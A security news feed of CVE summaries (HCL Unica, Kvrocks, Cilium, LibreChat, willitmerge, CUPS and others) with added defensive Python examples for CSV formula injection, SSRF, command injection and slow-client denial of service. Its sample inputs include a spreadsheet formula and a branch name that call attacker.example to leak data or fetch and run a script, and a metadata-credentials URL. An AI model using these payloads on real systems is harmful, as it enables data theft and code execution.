Bitcoin Core version 28.4 is now available for download. See the release notes for more information about the bug fixes in this release.
If you have any questions, please stop by the #bitcoin IRC chatroom (IRC, web) and we’ll do our best to help you.

[CVE-2025-51733] [Modified: 02-12-2025] [Analyzed] [V3.1 S5.5:MEDIUM] Cross-Site Request Forgery (CSRF) vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-51734] [Modified: 02-12-2025] [Analyzed] [V3.1 S5.4:MEDIUM] Cross-site scripting (XSS) vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-51735] [Modified: 02-12-2025] [Analyzed] [V3.1 S7.5:HIGH] CSV formula injection vulnerability in HCL Technologies Ltd. Unica 12.0.0.
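
CSV formula injection (CWE-1236) in general terms: an export writes untrusted field values into a CSV, an administrator opens it in a spreadsheet, and any cell beginning with =, +, -, @, tab or carriage return is evaluated as a formula instead of shown as text. The block below is an added illustration of the defect next to its standard mitigation and an audit helper for exports you already have; it is editorial example code, not HCL Unica's, and says nothing about where the flaw sits in that product. The rows are constructed sample data.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice and Google Sheets evaluate
# a cell as a formula instead of displaying it as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return `value` made safe for a spreadsheet.

    Strings that start with a formula trigger are prefixed with a single
    quote, which spreadsheets treat as a "display as text" marker.  Values
    that are not strings (real numbers, None) pass through unchanged, so
    export negative numbers as numbers rather than as strings like "-5".
    """
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_rows_vulnerable(rows):
    """The defect: every field is written verbatim, so an attacker-supplied
    value such as '=HYPERLINK(...)' or '=cmd|...' reaches the spreadsheet
    untouched.  CSV quoting alone is not a defence: quoting is CSV syntax,
    and the spreadsheet evaluates the cell after it has been unquoted."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()


def export_rows_safe(rows):
    """The mitigation: neutralize every cell before it reaches the writer."""
    buf = io.StringIO()
    csv.writer(buf).writerows([neutralize_cell(cell) for cell in row] for row in rows)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit helper for existing exports: list (row, col, value) for every
    cell a spreadsheet would interpret as a formula."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


# Constructed sample data: "name" is user-controlled, and the second user has
# chosen a name that, once clicked, leaks the neighbouring e-mail cell.
SAMPLE_ROWS = [
    ["id", "name", "email"],
    [1, "Alice", "alice@example.com"],
    [2, '=HYPERLINK("http://attacker.example/?v="&C3,"open")', "mallory@example.com"],
    [3, "-5 degrees", "bob@example.com"],
]

if __name__ == "__main__":
    print("vulnerable export flags:", find_formula_cells(export_rows_vulnerable(SAMPLE_ROWS)))
    print("hardened export flags:  ", find_formula_cells(export_rows_safe(SAMPLE_ROWS)))
```

The quote prefix is the mitigation OWASP recommends for text cells; where a consumer parses the CSV programmatically rather than in a spreadsheet, the prefix is visible data, so the safe exporter is the right choice only for files meant for humans.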

[CVE-2025-51736] [Modified: 02-12-2025] [Analyzed] [V3.1 S6.3:MEDIUM] File upload vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-59790] [Modified: 04-12-2025] [Analyzed] [V3.1 S5.4:MEDIUM] Improper Privilege Management vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from v2.9.0 through v2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

[CVE-2025-59792] [Modified: 04-12-2025] [Analyzed] [V3.1 S5.3:MEDIUM] Apache Kvrocks reveals plaintext credentials in the output of the MONITOR command. This issue affects Apache Kvrocks: from 1.0.0 through 2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

[CVE-2025-13683] [Modified: 18-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] Exposure of credentials in unintended requests in Devolutions Server and Remote Desktop Manager on Windows. This issue affects Devolutions Server: through 2025.3.8.0; Remote Desktop Manager: through 2025.3.23.0.

[CVE-2025-64715] [Modified: 04-12-2025] [Analyzed] [V3.1 S4.0:MEDIUM] Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicies which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than the policy authors intended. In such cases the toCIDRSet section of the derived policy is not generated, so outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue.
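
Because there is no workaround, the practical response is to find the policies that were silently deriving an empty toCIDRSet and to confirm the agent version. The following is an added audit script written for this entry; it is editorial example code, not Cilium's. It walks a CiliumNetworkPolicy in the JSON shape that `kubectl get cnp -o json` returns and flags every egress.toGroups.aws.securityGroupsIds entry that is missing from an inventory of security groups or attached to no network interface. The inventory and the policy below are constructed; in a real run the inventory would be filled from the EC2 DescribeSecurityGroups and DescribeNetworkInterfaces APIs.

```python
# Security group ID -> set of ENI IDs it is attached to.  Constructed for this
# example; in practice fill it from EC2 DescribeSecurityGroups (which IDs
# exist) and DescribeNetworkInterfaces (what each one is attached to).
SG_INVENTORY = {
    "sg-0a1b2c3d4e5f60001": {"eni-0a1b2c3d4e5f60001", "eni-0a1b2c3d4e5f60002"},
    "sg-0a1b2c3d4e5f60002": set(),  # exists but is attached to nothing
}

# First patched patch-level for each affected minor line, per the advisory.
FIXED_CILIUM = {(1, 16): 17, (1, 17): 10, (1, 18): 4}


def dangling_sg_references(policy, inventory):
    """Return (policy_name, egress_rule_index, sg_id, reason) for every AWS
    security group named in spec.egress[].toGroups[].aws.securityGroupsIds that
    does not exist or is attached to no network interface.  These are exactly
    the references for which an unpatched agent derives no toCIDRSet."""
    findings = []
    name = policy.get("metadata", {}).get("name", "<unnamed>")
    for index, rule in enumerate(policy.get("spec", {}).get("egress") or []):
        for group in rule.get("toGroups") or []:
            aws = group.get("aws") or {}
            for sg_id in aws.get("securityGroupsIds") or []:
                if sg_id not in inventory:
                    findings.append((name, index, sg_id, "security group does not exist"))
                elif not inventory[sg_id]:
                    findings.append((name, index, sg_id, "attached to no network interface"))
    return findings


def is_patched_cilium(version):
    """True if `version` is at or above the fixed release for its minor line,
    False if it is below it, None if the minor line is not one the advisory
    names (decide those separately)."""
    major, minor, patch = (int(part) for part in version.lstrip("v").split(".")[:3])
    fixed_patch = FIXED_CILIUM.get((major, minor))
    if fixed_patch is None:
        return None
    return patch >= fixed_patch


# Constructed policy: rule 0 references a healthy group, rule 1 two bad ones.
SAMPLE_POLICY = {
    "apiVersion": "cilium.io/v2",
    "kind": "CiliumNetworkPolicy",
    "metadata": {"name": "api-egress", "namespace": "payments"},
    "spec": {
        "endpointSelector": {"matchLabels": {"app": "api"}},
        "egress": [
            {
                "toGroups": [{"aws": {"securityGroupsIds": ["sg-0a1b2c3d4e5f60001"]}}],
                "toPorts": [{"ports": [{"port": "5432", "protocol": "TCP"}]}],
            },
            {
                "toGroups": [{"aws": {"securityGroupsIds": [
                    "sg-0a1b2c3d4e5f60002",  # exists, unattached
                    "sg-0f0f0f0f0f0f0f0f0",  # does not exist
                ]}}],
            },
        ],
    },
}

if __name__ == "__main__":
    for finding in dangling_sg_references(SAMPLE_POLICY, SG_INVENTORY):
        print("%s egress[%d] %s: %s" % finding)
    print("1.17.9 patched?", is_patched_cilium("1.17.9"))
```

Run it against every CiliumNetworkPolicy and CiliumClusterwideNetworkPolicy in the cluster; a hit means the egress rule was wider than written until the agent was upgraded, and is worth a look in flow logs for the affected period.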

[CVE-2025-65112] [Modified: 03-12-2025] [Analyzed] [V3.1 S9.4:CRITICAL] PubNet is a self-hosted Dart & Flutter package service. Prior to version 1.1.3, the /api/storage/upload endpoint in PubNet allows unauthenticated users to upload packages as any user by providing arbitrary author-id values. This enables identity spoofing, privilege escalation, and supply chain attacks. This issue has been patched in version 1.1.3.

[CVE-2025-65113] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.2 - #164, an authorization bypass vulnerability in the AJAX flagging system allows any unauthenticated user to flag any content (users, videos, photos, collections) on the platform. This can lead to mass flagging attacks, content disruption, and moderation system abuse. This issue has been patched in version 5.5.2 - #164.

[CVE-2025-66027] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.6, an information disclosure vulnerability exposes participant details, including names and email addresses through the /api/trpc/polls.get,polls.participants.list endpoint, even when Pro privacy features are enabled. This bypasses intended privacy controls that should prevent participants from viewing other users’ personal information. This issue has been patched in version 4.5.6.

[CVE-2025-66034] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.3:MEDIUM] fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 up to, but not including, 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2.

[CVE-2025-66201] [Modified: 03-12-2025] [Analyzed] [V3.1 S8.1:HIGH] LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.1-rc2, LibreChat is vulnerable to Server-side Request Forgery (SSRF), by passing specially crafted OpenAPI specs to its "Actions" feature and making the LLM use those actions. It could be used by an authenticated user with access to this feature to access URLs only accessible to the LibreChat server (such as cloud metadata services, through which impersonation of the server might be possible). This issue has been patched in version 0.8.1-rc2.
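
The general shape of this bug is a server fetching URLs taken from a user-supplied document; the guard a practitioner wants is a check on the destination before the fetch. The block below is an added example, not LibreChat's code or fix: it walks every `servers` entry an OpenAPI 3 document can carry (root, path item and operation level), resolves each host and rejects anything that lands on a non-public address, including the 169.254.169.254 metadata endpoint and IPv4-mapped IPv6 forms of it. The DNS answers and the spec are constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# OpenAPI 3 permits `servers` at the root, on each path item and on each
# operation; a crafted spec can point any of them at an internal host.
HTTP_METHODS = ("get", "put", "post", "delete", "options", "head", "patch", "trace")


def system_resolver(host):
    """Default resolver: every address the system DNS returns for `host`."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_disallowed_address(ip_text):
    """True for any address an outbound fetch must never reach: loopback,
    link-local (169.254.169.254 lives here), RFC 1918 / ULA space, multicast,
    reserved and unspecified.  IPv4-mapped IPv6 is unwrapped first so that
    ::ffff:169.254.169.254 is judged as 169.254.169.254."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (not addr.is_global) or addr.is_multicast


def check_outbound_url(url, resolver=system_resolver):
    """Return (ok, reason) for a URL the server is about to fetch for a user."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r is not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    try:
        ipaddress.ip_address(host)
        addresses = {host}  # literal IP: nothing to resolve
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError as exc:
            return False, "cannot resolve %s: %s" % (host, exc)
    # Every answer must be public: a name that returns one public and one
    # internal address is a rebinding attempt, not a legitimate API host.
    for address in sorted(addresses):
        if is_disallowed_address(address):
            return False, "%s resolves to non-public address %s" % (host, address)
    return True, "ok"


def iter_server_urls(spec):
    """Yield every server URL the spec could make the server contact."""
    for server in spec.get("servers") or []:
        yield server.get("url", "")
    for item in (spec.get("paths") or {}).values():
        for server in item.get("servers") or []:
            yield server.get("url", "")
        for method in HTTP_METHODS:
            operation = item.get(method)
            if isinstance(operation, dict):
                for server in operation.get("servers") or []:
                    yield server.get("url", "")


def audit_openapi_servers(spec, resolver=system_resolver):
    """Map each server URL in `spec` to its (ok, reason) verdict."""
    return {url: check_outbound_url(url, resolver) for url in iter_server_urls(spec)}


# Constructed DNS answers; 8.8.8.8 stands in for "some public address".
STUB_DNS = {
    "api.example.com": {"8.8.8.8"},
    "db.internal.example": {"10.0.0.5"},
    "rebind.attacker.example": {"8.8.8.8", "169.254.169.254"},
}


def stub_resolver(host):
    if host not in STUB_DNS:
        raise OSError("NXDOMAIN: " + host)
    return STUB_DNS[host]


# Constructed "Actions" spec: only the first server is legitimate.
SAMPLE_SPEC = {
    "openapi": "3.0.3",
    "info": {"title": "weather", "version": "1"},
    "servers": [
        {"url": "https://api.example.com/v1"},
        {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
    ],
    "paths": {
        "/status": {
            "servers": [{"url": "http://db.internal.example/"}],
            "get": {"servers": [{"url": "http://[fd00::1]/"}]},
        }
    },
}

if __name__ == "__main__":
    for url, (ok, reason) in audit_openapi_servers(SAMPLE_SPEC, stub_resolver).items():
        print("ALLOW" if ok else "BLOCK", url, "-", reason)
```

The check is only as good as its coupling to the fetch: connect to the address that was validated rather than resolving again (otherwise DNS rebinding turns this into a time-of-check/time-of-use hole), re-run it on every redirect, and apply it to any URL the model later extracts from an action's response as well.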

[CVE-2025-66219] [Modified: 19-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] willitmerge is a command line tool to check if pull requests are mergeable. In versions 0.2.1 and prior, there is a command injection vulnerability in willitmerge. The vulnerability stems from the use of an insecure child-process execution API (exec) to which user input is concatenated, whether that input is supplied via a command-line flag or comes from attacker-controlled content in the target repository. At time of publication, no known fix is public.
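
The defect class (CWE-78, OS command injection) and its fix, shown as an added Python illustration. This is not willitmerge's code; the git invocation is an assumed stand-in for the kind of command a mergeability checker runs. The same rule applies to Node's child_process: exec() hands a string to a shell, execFile() and spawn() take an argument vector, and neither form replaces input validation.

```python
import re
import subprocess

# Conservative ref-name allowlist, stricter than git-check-ref-format(1):
# alphanumeric start (so never a leading "-"), no "..", no "@{", no trailing
# ".", "/" or ".lock", and no whitespace or shell metacharacters at all.
REF_RE = re.compile(r"^(?!.*\.\.)(?!.*@\{)[A-Za-z0-9][A-Za-z0-9._/-]*(?<!\.lock)(?<!/)(?<!\.)$")

# Characters that make a shell do something other than pass the text along;
# used only to show what the string form exposes.
SHELL_META_RE = re.compile(r"[;&|`$()<>\n'\"\\]")


def is_valid_ref(name):
    return bool(REF_RE.match(name))


def contains_shell_metacharacters(command_line):
    return SHELL_META_RE.search(command_line) is not None


def build_command_vulnerable(repo, branch):
    """The anti-pattern: one shell string with user input concatenated in.
    Executed with shell=True (Node: child_process.exec), a branch named
    'x; curl http://attacker.example/p | sh' runs the attacker's command."""
    return "git -C " + repo + " merge-base --is-ancestor origin/" + branch + " HEAD"


def build_command_safe(repo, branch):
    """The fix: validate the name, then pass an argument vector.  No shell
    sees the string, so metacharacters are just bytes in a ref name, and the
    allowlist keeps a name starting with '-' from ever becoming a git option."""
    if not is_valid_ref(branch):
        raise ValueError("refusing unsafe ref name: %r" % branch)
    return ["git", "-C", repo, "merge-base", "--is-ancestor", "origin/" + branch, "HEAD"]


def branch_is_merged(repo, branch):
    """Run the safe form (shell=False is the default for a list argv).
    git merge-base --is-ancestor exits 0 when origin/<branch> is an ancestor
    of HEAD and 1 when it is not."""
    completed = subprocess.run(build_command_safe(repo, branch),
                               capture_output=True, text=True, check=False)
    return completed.returncode == 0


# Constructed attacker-controlled input, e.g. a branch name read from the
# repository being checked or passed through a --branch flag.
MALICIOUS_BRANCH = "feature; curl http://attacker.example/p | sh #"

if __name__ == "__main__":
    print(build_command_vulnerable("/srv/repo", MALICIOUS_BRANCH))
    try:
        build_command_safe("/srv/repo", MALICIOUS_BRANCH)
    except ValueError as exc:
        print("blocked:", exc)
    print(build_command_safe("/srv/repo", "feature/login-fix"))
```

Until a fix is public, the only safe use of the tool is on repositories and flags you fully control; a branch name is repository content and therefore attacker-controlled for any PR from a fork.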

[CVE-2025-53896] [Modified: 02-12-2025] [Analyzed] [V3.1 S7.1:HIGH] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, a bug in Kiteworks MFT could, under certain circumstances, cause a user's active session not to time out properly after inactivity. This issue has been patched in version 9.1.0.

[CVE-2025-53897] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.8:MEDIUM] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, this vulnerability could allow an external attacker to gain access to log information from the system by tricking an administrator into browsing a specifically crafted fake page of Kiteworks MFT. This issue has been patched in version 9.1.0.

[CVE-2025-53899] [Modified: 03-12-2025] [Analyzed] [V3.1 S7.2:HIGH] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the Kiteworks MFT back-end specifies the destination of a communication channel incorrectly, which under certain circumstances allows an attacker with administrative privileges on the system to intercept upstream communication and potentially escalate privileges. This issue has been patched in version 9.1.0.

[CVE-2025-53900] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, a flawed definition of roles and permissions for managing Connections in Kiteworks MFT could lead to unexpected privilege escalation for authorized users. This issue has been patched in version 9.1.0.

[CVE-2025-53939] [Modified: 04-12-2025] [Analyzed] [V3.1 S6.3:MEDIUM] Kiteworks is a private data network (PDN). Prior to version 9.1.0, improper input validation when managing roles of a shared folder could unexpectedly elevate another user's permissions on the share. This issue has been patched in version 9.1.0.

[CVE-2025-58436] [Modified: 04-12-2025] [Analyzed] [V3.1 S5.1:MEDIUM] OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to version 2.4.15, a client that connects to cupsd but sends slow messages, e.g. only one byte per second, delays cupsd as a whole, such that it becomes unusable by other clients. This issue has been patched in version 2.4.15.
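
The failure mode here is the generic slow-client (slowloris) denial of service: a read loop with no overall deadline lets one peer occupy a worker for as long as it keeps trickling bytes. The block below is added editorial example code, not cupsd's, showing a request-line reader with a total time budget and a size cap, plus a constructed client that drips bytes at a chosen rate so the behaviour can be exercised offline.

```python
import socket
import threading
import time


class SlowClientError(Exception):
    """The peer did not complete a request line within the time budget."""


def read_request_line(conn, max_bytes=8192, budget_seconds=5.0):
    """Read one CRLF-terminated line from `conn` under a total time budget.

    The remaining budget is re-applied as the socket timeout before every
    recv(), so a client sending one byte per second is cut off when the
    budget runs out instead of resetting a per-read timeout with each byte.
    The size cap bounds memory the way the budget bounds time.  Reading one
    byte at a time keeps the example short; a real server reads chunks into
    a buffer.
    """
    deadline = time.monotonic() + budget_seconds
    buf = bytearray()
    while True:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise SlowClientError("no complete request line after %.2fs" % budget_seconds)
        conn.settimeout(remaining)
        try:
            chunk = conn.recv(1)
        except socket.timeout:
            raise SlowClientError("no complete request line after %.2fs" % budget_seconds)
        if not chunk:
            raise ConnectionError("peer closed the connection mid-line")
        buf += chunk
        if buf.endswith(b"\r\n"):
            return bytes(buf[:-2])
        if len(buf) >= max_bytes:
            raise ValueError("request line longer than %d bytes" % max_bytes)


def serve_one(payload, delay_between_bytes, budget_seconds):
    """Constructed harness: a client thread drips `payload` one byte at a
    time, sleeping `delay_between_bytes` between bytes, while the server
    side runs read_request_line().  Returns ("ok", line) or ("slow", None)."""
    client, server = socket.socketpair()

    def drip():
        try:
            for i in range(len(payload)):
                client.sendall(payload[i:i + 1])
                time.sleep(delay_between_bytes)
        except OSError:
            pass  # the server gave up and closed its end; stop sending
        finally:
            client.close()

    sender = threading.Thread(target=drip, daemon=True)
    sender.start()
    try:
        return "ok", read_request_line(server, budget_seconds=budget_seconds)
    except SlowClientError:
        return "slow", None
    finally:
        server.close()
        sender.join()


if __name__ == "__main__":
    line = b"POST /printers/office HTTP/1.1\r\n"
    print("fast client:", serve_one(line, 0.0, 2.0))
    print("slow client:", serve_one(line, 0.25, 0.5))
```

A per-request budget protects one worker; the server as a whole also needs a cap on concurrent connections per source so that many slow clients cannot exhaust the worker pool even when each one is eventually dropped.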